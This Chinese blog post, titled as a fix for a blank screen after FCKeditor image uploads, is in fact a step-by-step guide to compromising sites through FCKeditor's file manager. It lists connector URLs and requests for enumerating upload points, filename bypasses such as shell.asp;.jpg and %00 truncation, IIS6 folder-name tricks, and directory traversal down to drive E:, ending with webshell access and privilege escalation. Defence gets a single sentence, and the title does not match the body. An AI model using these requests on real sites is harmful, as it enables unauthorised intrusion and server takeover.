投稿
  1. 簡單一點首頁
  2. 投稿

fckeditor上傳圖片後出現白屏的原因「fckeditor上傳圖片後出現白屏」

投稿專員 投稿

一. 關於FCKeditor

FCKeditor是一個網頁文本編輯器,在很多的內容管理系統里都有用到

本文簡單介紹通過FCKeditor上傳漏洞進行攻擊的思路,並對可能用到的操作進行整理

二. 攻擊思路

1.查看FCKeditor版本

http://127.0.0.1/fckeditor/editor/dialog/fck_about.html

http://127.0.0.1/FCKeditor/_whatsnew.html

2.測試上傳點

FCKeditor/editor/filemanager/browser/default/connectors/test.html

FCKeditor/editor/filemanager/upload/test.html

FCKeditor/editor/filemanager/connectors/test.html

FCKeditor/editor/filemanager/connectors/uploadtest.html

FCKeditor/_samples/default.html

FCKeditor/_samples/asp/sample01.asp

FCKeditor/_samples/asp/sample02.asp

FCKeditor/_samples/asp/sample03.asp

FCKeditor/_samples/asp/sample04.asp

FCKeditor/_samples/default.html

FCKeditor/editor/fckeditor.htm

FCKeditor/editor/fckdialog.html

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?

Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?

Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?

Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?

Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/browser.html?

Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/php/conne

ctor.php

FCKeditor/editor/filemanager/browser/default/browser.html?

Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/asp/conne

ctor.asp

FCKeditor/editor/filemanager/browser/default/browser.html?

Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/aspx/conn

ector.aspx

FCKeditor/editor/filemanager/browser/default/browser.html?

Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/jsp/conne

ctor.jsp

FCKeditor/editor/filemanager/browser/default/browser.html?

type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?

Type=Image&Connector=connectors/jsp/connector.jsp

fckeditor/editor/filemanager/browser/default/browser.html?

Type=Image&Connector=connectors/aspx/connector.Aspx

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Con

3.突破限制

3.1 上傳限制

上傳限制的突破方式很多,主要還是抓包改擴展名,%00截斷,添加文件頭等

3.2 文件名限制

3.2.1二次上傳繞過文件名『 . 』 修改為『 _ 』

FCK在上傳了諸如shell.asp;.jpg的文件後,會自動將文件名改為shell_asp;.jpg。可以繼續上傳同名

文件,文件名會變為shell.asp;(1).jpg

3.2.2提交shell.php+空格繞過

空格只支持windows系統,linux系統是不支持的,可提交shell.php+空格來繞過文件名限制。

3.3 IIS6.0突破文件夾限制

Fckeditor/editor/filemanager/connectors/asp/connector.asp?

Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp

FCKeditor/editor/filemanager/connectors/asp/connector.asp?

Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=124478997568

4

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?

Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp

3.4 文件解析限制

通過Fckeditor編輯器在文件上傳頁面中,創建諸如1.asp文件夾,然後再到該文件夾下上傳一個圖片的

webshell文件,獲取其shell。

http://127.0.0.1/images/upload/201806/image/1.asp/1.jpg

4.列目錄

4.1 FCKeditor/editor/fckeditor.html

FCKeditor/editor/fckeditor.html不可以上傳文件,可以點擊上傳圖片按鈕再選擇瀏覽服務器即可跳

轉至可上傳文件頁,可以查看已經上傳的文件。

4.2 根據xml返回信息查看網站目錄

http://127.0.0.1/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.as

px?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp

4.3 獲取當前文件夾

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?

Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?

Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?

Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

4.4 瀏覽E盤文件

/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?

Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/

5. 連接木馬

在木馬能夠解析之後,使用各類工具連接到木馬,獲取webshell。至此,利用FCKeditor進行文件上傳

並攻擊的過程就已經完成

三. 其他

在獲取到webshell之後,可以進行的操作非常多,也便於提權操作,拿下主機權限並不困難。

關於該漏洞的防禦,可以刪除掉所有的上傳點,並限制目錄訪問。

原創文章,作者:投稿專員,如若轉載,請註明出處:https://www.506064.com/zh-hk/n/209379.html

(0)
打賞 微信掃一掃 微信掃一掃 支付寶掃一掃 支付寶掃一掃
投稿專員的頭像投稿專員
0 0
上一篇 2024-12-08 15:36
下一篇 2024-12-08 15:36

相關推薦

發表回復

登錄後才能評論